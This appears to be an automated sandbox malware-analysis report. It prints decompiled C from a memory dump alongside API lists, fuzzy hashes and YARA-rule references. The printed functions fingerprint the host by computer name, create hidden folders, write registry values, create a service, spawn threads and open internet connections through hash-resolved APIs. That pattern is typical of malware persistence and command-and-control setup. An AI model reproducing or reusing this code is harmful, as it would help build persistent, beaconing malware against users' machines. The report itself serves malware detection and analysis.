0x000a4c99
0x000a4ca5
0x000a4cad
0x000a4cb9
0x000a4cbc
0x000a4ce3
0x000a4cec
0x000a4d03
0x000a4d06
0x000a4d0c
0x000a4d11
0x000a4d14
0x000a4d16
0x000a4ec7
0x000a4ec7
0x000a4ec7
0x000a4d1c
0x000a4d21
0x000a4d42
0x000a4d55
0x000a4d66
0x000a4d73
0x000a4d8c
0x000a4da9
0x000a4db0
0x000a4db5
0x000a4db8
0x000a4dba
0x00000000
0x000a4dc0
0x000a4dc0
0x000a4dc6
0x000a4dcd
0x000a4de7
0x000a4dec
0x000a4def
0x000a4df1
0x000a4dfc
0x000a4dfc
0x000a4e00
0x000a4e06
0x000a4e0b
0x000a4e0b
0x000a4e0e
0x000a4e16
0x000a4e18
0x000a4e1f
0x000a4e36
0x000a4e3b
0x000a4e3e
0x000a4e40
0x000a4e48
0x000a4e48
0x000a4e52
0x000a4e5b
0x000a4e60
0x000a4e6d
0x000a4e72
0x000a4e72
0x000a4e75
0x000a4e7a
0x000a4e84
0x000a4e86
0x000a4e8f
0x000a4eb9
0x000a4eb9
0x000a4ebe
0x000a4ec3
0x000a4ec3
0x000a4dba
0x000a4ecc
0x000a4ed4
0x000a4edc
0x000a4ee4
0x000a4eef
0x000a4efa
0x000a4f05
0x000a4f10
0x000a4f1b
0x000a4f26
0x000a4f31
0x000a4f3c
0x000a4f47
0x000a4f4f
0x00000000
0x00000000
0x00000000
0x000a46f2
0x000a4f60

APIs

SHGetFolderPathW.SHELL32(00000000,0000801A,00000000,00000000,?), ref: 000A46EE

Part of subcall function 000A5180: CreateDirectoryW.KERNEL32(?,00000000), ref: 000A51F0

Part of subcall function 000921E0: RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00092210

Part of subcall function 0009A5E0: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 0009A620

CreateThread.KERNEL32(00000000,00000000,Function_00015420,00000000,00000000,00000000), ref: 000A4EB9

Part of subcall function 000A9C40: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?), ref: 000A9C6F
Part of subcall function 000A9C40: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 000A9C89

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Create$CloseDirectoryFileFolderFreeHandlePathThreadVirtual
String ID:
API String ID: 1450970588-0
Opcode ID: e47609c2aa1e07dce6eadc5be58084e30b77ab60383782c6dd544ffad4d732f7
Instruction ID: e26f6a2a927ebc3eb0cd91757af0931e6c7052d795acac1f300664f7a469dd9f
Opcode Fuzzy Hash: e47609c2aa1e07dce6eadc5be58084e30b77ab60383782c6dd544ffad4d732f7
Instruction Fuzzy Hash: AD32D3B5E002096BDF10EBE0DC53FFE7269AB51314F540574F819A72C3EE706A098BA2

Uniqueness

Uniqueness Score: -1.00%

Function 000A3BC0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E000A3BC0(intOrPtr __ecx, void* __eflags) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v52;
				char _v86;
				char _v122;
				char _v158;
				char _v196;
				char _v256;
				short _v456;
				char _v574;
				char _v774;
				int _t23;
				void* _t25;
				intOrPtr* _t27;
				void* _t28;
				void* _t30;
				char _t33;
				intOrPtr _t36;
				void* _t38;
				void* _t40;
				signed char _t43;
				char* _t53;
				DWORD* _t59;
				void* _t61;
				void* _t62;
				void* _t66;

				_v24 = __ecx;
				_v20 = 0x64;
				E0009BF50(__eflags, 0, 0x6f6e3c7);
				_t62 = _t61 + 8;
				_t59 =  &_v20;
				_t23 = GetComputerNameW( &_v456, _t59); // executed
				_t81 = _t23;
				if(_t23 == 0) {
					E000A7700( &_v456, E00097200(0xb075e,  &_v122), 0xffffffff);
					_t62 = _t62 + 0x14;
				}
				_v20 = E00099D50(0x647400c8);
				_t25 = E00099D50(0x647400a5);
				_t27 = E0009BF50(_t81, _t25, E00099D50(0x6e1cdffb));
				_t66 = _t62 + 0x14;
				_t53 =  &_v774;
				_t28 =  *_t27(_t53, _t59);
				_t82 = _t28;
				if(_t28 == 0) {
					E000A7700(_t53, E00097200(0xb075e,  &_v52), 0xffffffff);
					_t66 = _t66 + 0x14;
				}
				_t30 = E00097200(0xb0a40,  &_v574);
				_t33 = E00095350(_t82, 0x80000002, _t30, E00097200(0xb0500,  &_v196)); // executed
				_v32 = _t33;
				_t36 = E0009E360(E00097200(0xb07b0,  &_v256), _t82, 0x80000002, _t30, _t35); // executed
				_v28 = _t36;
				_t38 = E00097200(0xb0990,  &_v158);
				_t40 = E000ACC50( &_v32, _t82,  &_v32, 8);
				_push(_t53);
				_push(_t40);
				_t60 = _v24;
				_v20 = E000AD650( &_v456, _v24, 0x65, _t38,  &_v456);
				_t43 = E000955C0(_t42, 0xffffffff);
				if((_t43 & 0x00000001) != 0) {
					return E000A7700(_t60, E00097200(0xb08a0,  &_v86), 0xffffffff);
				}
				return _t43;
			}

0x000a3bcc
0x000a3bcf
0x000a3bdd
0x000a3be2
0x000a3be5
0x000a3bf0
0x000a3bf2
0x000a3bf4
0x000a3c0b
0x000a3c10
0x000a3c10
0x000a3c20
0x000a3c28
0x000a3c41
0x000a3c46
0x000a3c49
0x000a3c51
0x000a3c53
0x000a3c55
0x000a3c6c
0x000a3c71
0x000a3c71
0x000a3c80
0x000a3ca5
0x000a3cad
0x000a3ccb
0x000a3cd3
0x000a3ce2
0x000a3cf2
0x000a3cfa
0x000a3cfb
0x000a3d06
0x000a3d12
0x000a3d18
0x000a3d22
0x00000000
0x000a3d3e
0x000a3d4b

APIs

GetComputerNameW.KERNEL32(?,00000064), ref: 000A3BF0

Strings

d, xrefs: 000A3BCF

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: ComputerName
String ID: d
API String ID: 3545744682-2564639436
Opcode ID: d74ed48a5e45c76f814f9f084625e3bcd4a40715cd98bb2d6d30f83ba29f1bf0
Instruction ID: 4b4a9cf9320b269edf301113e3bbf16b8a91b567772b7bbc5c29563ce441ba0e
Opcode Fuzzy Hash: d74ed48a5e45c76f814f9f084625e3bcd4a40715cd98bb2d6d30f83ba29f1bf0
Instruction Fuzzy Hash: 7F31C3E3C441187AEB11A7A0AC03DFF766C9B12715F050135FD1CA2283FA21AB188BF2

Uniqueness

Uniqueness Score: -1.00%

Function 000A5180, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000A5180(void* __ecx, intOrPtr __edx, char* _a4, char _a8) {
				intOrPtr _v20;
				char _v50;
				short _v52;
				char _v572;
				int _t10;
				void* _t16;
				char* _t20;
				void* _t25;
				WCHAR* _t27;
				void* _t28;
				void* _t29;
				void* _t31;

				_t20 = _a4;
				_t25 = __ecx;
				_v20 = __edx;
				_v52 = 0;
				_t34 = _t20;
				if(_t20 == 0) {
					_t20 =  &_v52;
					_v52 = 0x2e;
					E00095CD0(_t34, 0,  &_v50, 2, 3);
					_t28 = _t28 + 0x10;
				}
				_t27 =  &_v572;
				_t10 = E00091490(2, _t25, _t27, 0, 3, 5); // executed
				_t29 = _t28 + 0x18;
				_t35 = _t10;
				if(_t10 != 0) {
					E0009BF50(_t35, 0, E00099D50(0x677c729b));
					_t31 = _t29 + 0xc;
					_t10 = CreateDirectoryW(_t27, 0); // executed
					if(_t10 != 0) {
						_t37 = _a8;
						if(_a8 != 0) {
							E000A0F60(_t37, _t27, 1, 1); // executed
							_t31 = _t31 + 0xc;
						}
						E000AECC0(E00099D50(0x647401a8));
						_t16 = E00091490(0, _t27, E000AFCF0(_v20), _t20, 3, 5); // executed
						return _t16;
					}
				}
				return _t10;
			}

0x000a518c
0x000a518f
0x000a5191
0x000a5194
0x000a519a
0x000a519c
0x000a519e
0x000a51a1
0x000a51b1
0x000a51b6
0x000a51b6
0x000a51b9
0x000a51c9
0x000a51ce
0x000a51d1
0x000a51d3
0x000a51e5
0x000a51ea
0x000a51f0
0x000a51f4
0x000a51f6
0x000a51fa
0x000a5201
0x000a5206
0x000a5206
0x000a521c
0x000a5231
0x00000000
0x000a5236
0x000a51f4
0x000a5243

APIs

CreateDirectoryW.KERNEL32(?,00000000), ref: 000A51F0

Strings

., xrefs: 000A51A1

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateDirectory
String ID: .
API String ID: 4241100979-248832578
Opcode ID: 3acc9fe88f1adef59864c2781f8d3f52916a3d1e9f74662e92389375f329ca32
Instruction ID: 98b28f1730cafa2b0814f29adbad9fffe3e45810f82169d2cf3611196d2162e0
Opcode Fuzzy Hash: 3acc9fe88f1adef59864c2781f8d3f52916a3d1e9f74662e92389375f329ca32
Instruction Fuzzy Hash: DE1194A5A8031436FB2076D5AC5BFFF766C9F56B55F050024FE087A2C3FAA15A0486E2

Uniqueness

Uniqueness Score: -1.00%

Function 000A58D0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E000A58D0(void* __eax, void* __ecx, void* __edx, void* __eflags, char _a4) {
				char _v17;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v66;
				char _v124;
				char _v238;
				char _v1278;
				char _v1794;
				void* __esi;
				signed char _t35;
				signed char _t37;
				void* _t38;
				intOrPtr* _t40;
				signed char _t44;
				intOrPtr* _t45;
				signed char _t47;
				intOrPtr _t50;
				void* _t51;
				void* _t52;
				signed int _t53;
				void* _t54;
				intOrPtr* _t56;
				intOrPtr* _t57;
				intOrPtr _t63;
				void* _t64;
				void* _t67;
				void* _t68;
				void* _t69;
				intOrPtr _t70;
				intOrPtr _t88;
				void* _t89;
				void* _t90;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t103;
				void* _t105;
				void* _t107;
				void* _t108;
				void* _t112;
				void* _t113;
				void* _t116;

				_t116 = __eflags;
				_push(__eax);
				_t1 =  &_a4; // 0xa37e6
				_t86 = __edx;
				_t69 = __ecx;
				_v17 =  *_t1;
				_t89 = L0009C1E0(0x1c);
				E000AED20(_t30);
				L000AFA50(_t89, _t69);
				_t3 = _t89 + 0xc; // 0xc
				_t77 = _t3;
				L000AFA50(_t3, __edx);
				 *((char*)(_t89 + 0x18)) = _v17;
				_t35 = E000A9AC0(_t116, 0xffffffff); // executed
				_t37 = E00094350(_t35 & 0x000000ff, 4);
				_t98 = _t95 + 0x10;
				_t117 = _t37 & 0x00000001;
				if((_t37 & 0x00000001) != 0) {
					_t77 = _t89;
					_t98 = _t98 + 4;
					_pop(_t89);
					_pop(_t86);
					_pop(_t69);
					_pop(_t93);
					_t90 = _t77;
					_t38 = E000AFCF0(_t77 + 0xc);
					_t87 =  &_v1794;
					E000A7700(_t87, _t38, 0xffffffff);
					_t40 = E0009BF50(_t117, 3, 0x5ea9ec7);
					 *_t40(_t87, _t89, _t86, _t69, _t93);
					_t44 = E00094350(E000A9AC0(_t117, 0xffffffff) & 0x000000ff, 4);
					_t103 = _t98 - 0x6f4 + 0x20;
					if((_t44 & 0x00000001) != 0) {
						_t45 = E0009BF50(__eflags, 9, 0x28243c7);
						_t70 =  *_t45(0, 0, 2);
						_t47 = E0009A500(__eflags, _t46, 0);
						_t105 = _t103 + 0x10;
						__eflags = _t47 & 0x00000001;
						if((_t47 & 0x00000001) == 0) {
							__eflags =  *((char*)(_t90 + 0x18));
							_v24 = _t70;
							if( *((char*)(_t90 + 0x18)) == 0) {
								E000A7700( &_v1278, _t87, 0xffffffff);
								_t107 = _t105 + 0xc;
							} else {
								E000AD650(E00097200(0xb0840,  &_v66),  &_v1278, 0x208, _t60, _t87);
								_t107 = _t105 + 0x18;
							}
							_t50 = E0009BF50(__eflags, 9, 0x42453f7);
							_t108 = _t107 + 8;
							_v28 = _t50;
							_t51 = E000AFCF0(_t90);
							_t52 = E000AFCF0(_t90);
							_t88 = _v24;
							_t53 = _v28(_t88, _t52, _t51, 0xf01ff, 0x110, 2, 0,  &_v1278, 0, 0, 0, 0, 0);
							__eflags = _t53;
							if(__eflags != 0) {
								_t57 = E0009BF50(__eflags, 9, 0x48eed75);
								_t108 = _t108 + 8;
								 *_t57(_t53);
							}
							_t54 = E00099D50(0x647400a5);
							_t56 = E0009BF50(__eflags, _t54, E00099D50(0x60faedd9));
							_t105 = _t108 + 0x10;
							_t47 =  *_t56(_t88);
						}
					} else {
						_t63 = E00097200(0xb0c50,  &_v238);
						_t112 = _t103 + 8;
						_t119 =  *((char*)(_t90 + 0x18));
						_v24 = _t63;
						if( *((char*)(_t90 + 0x18)) == 0) {
							_t64 = E0009BA30(__eflags, _t87);
							_t113 = _t112 + 4;
						} else {
							_t67 = E00097200(0xb0840,  &_v124);
							_t68 = E00099D50(0x647402a4);
							_t84 =  &_v1278;
							_t87 =  &_v1278;
							_t64 = E000AD650(_t68, _t84, _t68, _t67,  &_v1278);
							_t113 = _t112 + 0x1c;
						}
						_t47 = E000A2450(_t119, 0x80000001, _v24, E000AFCF0(_t90), _t87, _t64);
						_t105 = _t113 + 0x14;
					}
					return _t47;
				} else {
					__eax = E0009BF50(__eflags, 0, 0xa0733d4);
					__eax = CreateThread(0, 0, E0009BE30, __esi, 0, 0); // executed
					__esp = __esp + 4;
					return __eax;
				}
			}

0x000a58d0
0x000a58d6
0x000a58d7
0x000a58da
0x000a58dc
0x000a58de
0x000a58ed
0x000a58ef
0x000a58f7
0x000a58fc
0x000a58fc
0x000a5900
0x000a5908
0x000a590d
0x000a591b
0x000a5920
0x000a5923
0x000a5925
0x000a594e
0x000a5950
0x000a5953
0x000a5954
0x000a5955
0x000a5956
0x000a223c
0x000a2241
0x000a2246
0x000a2250
0x000a225f
0x000a2268
0x000a227a
0x000a227f
0x000a2284
0x000a22e4
0x000a22f4
0x000a22f9
0x000a22fe
0x000a2301
0x000a2303
0x000a2309
0x000a230d
0x000a2310
0x000a236f
0x000a2374
0x000a2312
0x000a2331
0x000a2336
0x000a2336
0x000a237e
0x000a2383
0x000a2388
0x000a238b
0x000a2394
0x000a23ba
0x000a23be
0x000a23c1
0x000a23c3
0x000a23ce
0x000a23d3
0x000a23d7
0x000a23d7
0x000a23de
0x000a23f7
0x000a23fc
0x000a2400
0x000a2400
0x000a2286
0x000a2292
0x000a2297
0x000a229a
0x000a229e
0x000a22a1
0x000a233c
0x000a2341
0x000a22a7
0x000a22b0
0x000a22bf
0x000a22c7
0x000a22d1
0x000a22d3
0x000a22d8
0x000a22d8
0x000a2358
0x000a235d
0x000a235d
0x000a240c
0x000a5927
0x000a592e
0x000a5944
0x000a5946
0x000a594d
0x000a594d

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0000BE30,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 000A5944

Strings

7, xrefs: 000A58D7

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateThread
String ID: 7
API String ID: 2422867632-2497961398
Opcode ID: 53359471cf68dd602f82b61dd4ba48720037d418cabb661f57922f2fe40ad8d7
Instruction ID: 7b4959f3ddd8a6a0327100069a87490279bf89a23305e98a9d85f32ef9685855
Opcode Fuzzy Hash: 53359471cf68dd602f82b61dd4ba48720037d418cabb661f57922f2fe40ad8d7
Instruction Fuzzy Hash: DE01F7A6B8425436E92061E93C13FFF7A584B92B75F080075FA5D9A2C3E8416614A2F3

Uniqueness

Uniqueness Score: -1.00%

Function 000A9600, Relevance: 3.1, APIs: 2, Instructions: 93
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E000A9600(void* __eax, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v20;
				long _t8;
				long _t9;
				long _t10;
				void* _t11;
				intOrPtr* _t20;
				int _t22;
				signed char _t24;
				long _t25;
				void* _t28;
				void* _t30;
				void* _t31;
				void* _t35;

				_push(__eax);
				E0009BF50(__eflags, 0, 0xad68947);
				_t8 = E00099D50(0x247400ac);
				_t9 = E00099D50(0x647400ae);
				_t10 = E00099D50(0x6474002c);
				_t35 = _t31 + 0x14;
				_t11 = CreateFileW(_a4, _t8, 1, 0, _t9, _t10, 0); // executed
				if(_t11 == 0xffffffff) {
					_t24 = 0;
					L9:
					return E00093660(_t46, E00095080(_t46, 0x48, E00092FE0(_t11, _t46, 0x48, 0xff) & 0x000000ff) & _t24 & 0x000000ff, 0) & 0x00000001;
				}
				_t28 = _a8;
				_t30 = _t11;
				if(_t28 == 0) {
					L4:
					_t24 = 1;
					L7:
					_t20 = E0009BF50(_t45, 0, E00099D50(0x6ffa7d19));
					_t35 = _t35 + 0xc;
					_t11 =  *_t20(_t30);
					_t46 = _t24;
					if(_t24 == 0) {
						_t11 = E000AAE30(_t46, _a4);
						_t35 = _t35 + 4;
					}
					goto L9;
				}
				_t25 = _a12;
				_t44 = _t25;
				if(_t25 == 0) {
					goto L4;
				}
				E0009BF50(_t44, 0, 0xabb2b5);
				_t35 = _t35 + 8;
				_t22 = WriteFile(_t30, _t28, _t25,  &_v20, 0); // executed
				_t45 = _t22;
				if(_t22 == 0) {
					_t24 = 0;
					__eflags = 0;
					goto L7;
				}
				goto L4;
			}

0x000a9606
0x000a960e
0x000a961d
0x000a962c
0x000a963b
0x000a9640
0x000a964f
0x000a9654
0x000a9688
0x000a96b8
0x000a96ee
0x000a96ee
0x000a9656
0x000a9659
0x000a965d
0x000a9684
0x000a9684
0x000a968e
0x000a969e
0x000a96a3
0x000a96a7
0x000a96a9
0x000a96ab
0x000a96b0
0x000a96b5
0x000a96b5
0x00000000
0x000a96ab
0x000a965f
0x000a9662
0x000a9664
0x00000000
0x00000000
0x000a966d
0x000a9672
0x000a967e
0x000a9680
0x000a9682
0x000a968c
0x000a968c
0x00000000
0x000a968c
0x00000000

APIs

CreateFileW.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 000A964F
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,00000000,00000000,?,?,00000000), ref: 000A967E

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: File$CreateWrite
String ID:
API String ID: 2263783195-0
Opcode ID: bfeb5540bc80b74d15f1affca5b21e5282fa28de42bf632360cdcd3cb50a2787
Instruction ID: 5c71efaef33510c642e86e5f8567699476e48a8fd670ed4884abaec6fda91150
Opcode Fuzzy Hash: bfeb5540bc80b74d15f1affca5b21e5282fa28de42bf632360cdcd3cb50a2787
Instruction Fuzzy Hash: 0E2196E6A802053AEE1125B46C53FBE31488FA2759F1A0434FE085A283F9929A1856B3

Uniqueness

Uniqueness Score: -1.00%

Function 000AB790, Relevance: 3.1, APIs: 2, Instructions: 91
networkCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E000AB790(void* __eflags, intOrPtr _a4, char* _a8, signed short _a12, signed int _a16) {
				void* _t10;
				void* _t12;
				intOrPtr* _t14;
				signed int _t18;
				void* _t19;
				void* _t20;
				intOrPtr* _t22;
				intOrPtr _t30;
				signed int _t31;
				char* _t32;
				void* _t36;
				void* _t37;
				void* _t38;

				_t30 = _a4;
				E0009BF50(__eflags, 0x13, 0xd0ca371);
				_t38 = _t37 + 8;
				_t26 =  !=  ? _t30 : 0xb0580;
				_t10 = InternetOpenA( !=  ? _t30 : 0xb0580,  !_a16 & 0x00000001, 0, 0, 0); // executed
				if(_t10 == 0) {
					L6:
					return 0;
				}
				_t36 = _t10;
				_t31 = 0;
				do {
					_t12 = E00099D50(0x647400bf);
					_t14 = E0009BF50(0, _t12, E00099D50(0x61c0d6ad));
					 *_t14(_t36,  *((intOrPtr*)(0xb07fc + _t31 * 8)), 0xb0800 + _t31 * 8, 4);
					_t18 = E00091460(0, E000922E0(0, _t31, 0x6ac13eca) + 1, 0x6ac13eca);
					_t38 = _t38 + 0x20;
					_t31 = _t18;
					_t50 = _t18 - 3;
				} while (_t18 != 3);
				_t32 = _a8;
				_t19 = E0009ABC0(_t50, _t32);
				_t20 = 0;
				_t51 = _t19;
				if(_t19 > 0) {
					E0009BF50(_t51, 0x13, 0xae775e1);
					_t20 = InternetConnectA(_t36, _t32, _a12 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
					if(0 == 0) {
						_t22 = E0009BF50(0, 0x13, 0x714b685);
						 *_t22(_t36);
						goto L6;
					}
				}
				return _t20;
			}

0x000ab799
0x000ab7a5
0x000ab7aa
0x000ab7b7
0x000ab7c2
0x000ab7c6
0x000ab87a
0x00000000
0x000ab87a
0x000ab7cc
0x000ab7ce
0x000ab7d0
0x000ab7d5
0x000ab7ee
0x000ab808
0x000ab81f
0x000ab824
0x000ab827
0x000ab829
0x000ab829
0x000ab82e
0x000ab832
0x000ab83c
0x000ab83e
0x000ab840
0x000ab849
0x000ab862
0x000ab866
0x000ab86f
0x000ab878
0x00000000
0x000ab878
0x000ab866
0x000ab880

APIs

InternetOpenA.WININET(000B0580,?,00000000,00000000,00000000,?,0009CD77,?,?,?,00000001,00000000,?,0009CD77,?,00000001), ref: 000AB7C2
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00000004), ref: 000AB862

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Internet$ConnectOpen
String ID:
API String ID: 2790792615-0
Opcode ID: c710bd5e375eb3946b5df87314f6134a6c14a58f37a832ce665747257abeea6c
Instruction ID: a3e35fedb128c82c0eec56d3c8d5161dcb093d70ff9315ceccde59e533e68921
Opcode Fuzzy Hash: c710bd5e375eb3946b5df87314f6134a6c14a58f37a832ce665747257abeea6c
Instruction Fuzzy Hash: 5E21EEB6B4020536FE2066757C23FBF35498B92759F150034FA09A6183FE91EA0155B2

Uniqueness

Uniqueness Score: -1.00%

Function 000921E0, Relevance: 3.1, APIs: 2, Instructions: 89
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E000921E0(intOrPtr _a4, void* _a8, short* _a12, short* _a16, signed char _a20, signed char _a24) {
				void* _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				int _v36;
				long _t20;
				int _t25;
				long _t26;
				intOrPtr* _t27;
				intOrPtr* _t30;
				long _t32;
				long _t33;
				void* _t42;
				void* _t43;
				void* _t47;

				E0009BF50(_t47, 9, 0x7b43ce7);
				_t43 = _t42 + 8;
				_t20 = RegCreateKeyExW(_a8, _a12, 0, 0, 0, 4, 0,  &_v20, 0); // executed
				if(_t20 == 0) {
					_t32 = 0x64;
					_v28 = _a24 & 0x000000ff;
					_v24 = _a20 & 0x000000ff;
					do {
						E00095CD0(__eflags, _a4, _a16, _v24, _v28);
						E0009BF50(__eflags, 9, 0x7b43ce7);
						_t25 = E00099D50(0x647400af);
						_t43 = _t43 + 0x1c;
						_t26 = RegCreateKeyExW(_v20, _a16, 0, 0, 0, _t25, 0,  &_v32,  &_v36); // executed
						__eflags = _t26;
						if(__eflags != 0) {
							goto L3;
						} else {
							_t30 = E0009BF50(__eflags, 9, 0x3111c69);
							_t43 = _t43 + 8;
							 *_t30(_v32);
							__eflags = _v36 - 1;
							if(__eflags != 0) {
								goto L3;
							} else {
								_t33 = 1;
							}
						}
						L8:
						_t27 = E0009BF50(__eflags, 9, 0x3111c69);
						 *_t27(_v20);
						goto L9;
						L3:
						_t32 = _t32 - 1;
						__eflags = _t32;
					} while (__eflags != 0);
					_t33 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t33 = 0;
				}
				L9:
				return _t33;
			}

0x000921f6
0x000921fb
0x00092210
0x00092214
0x00092225
0x0009222a
0x0009222d
0x00092243
0x00092250
0x0009225f
0x00092271
0x00092276
0x0009228e
0x00092290
0x00092292
0x00000000
0x00092294
0x0009229b
0x000922a0
0x000922a6
0x000922a8
0x000922ac
0x00000000
0x000922ae
0x000922ae
0x000922ae
0x000922ac
0x000922b4
0x000922bb
0x000922c6
0x00000000
0x00092240
0x00092240
0x00092240
0x00092240
0x000922b2
0x000922b2
0x00000000
0x00092216
0x00092216
0x00092216
0x000922c8
0x000922d1

APIs

RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00092210
RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0009228E

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c21274959b6386e64019958d2eec60caeb902cba88aa17351dd5b120125669bc
Instruction ID: fb471403ba7db389b86e66c56b0c3150b843541ae7cfc357d9a195603fbaec2f
Opcode Fuzzy Hash: c21274959b6386e64019958d2eec60caeb902cba88aa17351dd5b120125669bc
Instruction Fuzzy Hash: E92186B2A403197FEF21AB909D53FFE7664AB15B10F140034FA14762D2E6A1A924E6B1

Uniqueness

Uniqueness Score: -1.00%

Function 000A3D80, Relevance: 3.1, APIs: 2, Instructions: 72
registryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E000A3D80(void* __eflags, void* _a4, short* _a8, short* _a12, int _a16, char* _a20, int _a24) {
				void* _t12;
				signed char _t13;
				void* _t14;
				long _t17;
				void* _t18;
				signed int _t21;
				intOrPtr* _t22;
				char* _t28;
				signed int _t29;

				_t44 = __eflags;
				_t13 = E000A5000(_t12, __eflags, 0xffffffff);
				_t14 = E00099D50(0x647400a5);
				E0009BF50(_t44, _t14, E00099D50(0x63c03c4b));
				_t17 = RegCreateKeyExW(_a4, _a8, 0, 0, 0, (_t13 & 0x000000ff) << 0x00000008 | 0x00000002, 0,  &_a4, 0); // executed
				if(_t17 == 0) {
					_t28 = _a20;
					_t18 = E00099D50(0x647400a5);
					E0009BF50(__eflags, _t18, E00099D50(0x69a6701b));
					_t21 = RegSetValueExW(_a4, _a12, 0, _a16, _t28, _a24); // executed
					__eflags = _t21;
					_t10 = _t21 == 0;
					__eflags = _t10;
					_t29 = _t28 & 0xffffff00 | _t10;
					_t22 = E0009BF50(_t10, 9, 0x3111c69);
					 *_t22(_a4);
				} else {
					_t29 = 0;
				}
				return _t29;
			}

0x000a3d80
0x000a3d8b
0x000a3da1
0x000a3dba
0x000a3dd5
0x000a3dd9
0x000a3ddf
0x000a3dea
0x000a3e03
0x000a3e18
0x000a3e1a
0x000a3e1c
0x000a3e1c
0x000a3e1c
0x000a3e26
0x000a3e31
0x000a3ddb
0x000a3ddb
0x000a3ddb
0x000a3e39

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,?,00000002,?,00000000), ref: 000A3DD5
RegSetValueExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 000A3E18

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateValue
String ID:
API String ID: 2259555733-0
Opcode ID: 96e8cb35c373eb8ba011f26dd568d909fbde63113441cb5beea8bdcf5d9670c8
Instruction ID: 34f914742957e9b3a923979f7d0b4f0d0f3ef5a07ae0aaef82da9af9b250b3e3
Opcode Fuzzy Hash: 96e8cb35c373eb8ba011f26dd568d909fbde63113441cb5beea8bdcf5d9670c8
Instruction Fuzzy Hash: 3E1106B69002443FEF116AA4AC93FEF360CDB52769F150034FE1895293E651EA2496F3

Uniqueness

Uniqueness Score: -1.00%

Function 0009AD80, Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0009AD80(void* __eflags, intOrPtr _a4, void* _a8) {
				void* _v16;
				long _v20;
				void* _t10;
				intOrPtr* _t12;
				void* _t13;
				void* _t15;
				int _t19;
				void* _t24;
				void* _t26;
				void* _t27;
				void* _t30;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v20 = 0;
				_v16 = 0;
				_t10 = E00099D50(0x647400a5);
				_t12 = E0009BF50(_t33, _t10, E00099D50(0x6b5f7e12));
				_t30 = _t27 + 0x10;
				_t13 =  *_t12(_a4, 8,  &_v16);
				_t34 = _t13;
				if(_t13 == 0) {
					_t26 = 0;
					__eflags = 0;
					L7:
					return _t26;
				}
				_t24 = _a8;
				_t15 = E000AB530(_t13, _t34, _v16); // executed
				_t31 = _t30 + 4;
				_t26 = _t15;
				if(_t24 != 0) {
					_t36 = _t26;
					if(_t26 != 0) {
						E0009BF50(_t36, 9, 0xbd557e);
						_t31 = _t31 + 8;
						_t19 = GetTokenInformation(_v16, 0xc, _t24, 4,  &_v20); // executed
						if(_t19 == 0) {
							E0009B570(_t26);
							_t31 = _t31 + 4;
							_t26 = 0;
						}
					}
				}
				E0009BF50(0, 0, 0xb8e7db5);
				CloseHandle(_v16); // executed
				goto L7;
			}

0x0009ad80
0x0009ad8b
0x0009ad92
0x0009ad9e
0x0009adb7
0x0009adbc
0x0009adc6
0x0009adc8
0x0009adca
0x0009ae26
0x0009ae26
0x0009ae28
0x0009ae30
0x0009ae30
0x0009adcc
0x0009add2
0x0009add7
0x0009adda
0x0009adde
0x0009ade0
0x0009ade2
0x0009adeb
0x0009adf0
0x0009adff
0x0009ae03
0x0009ae06
0x0009ae0b
0x0009ae0e
0x0009ae0e
0x0009ae03
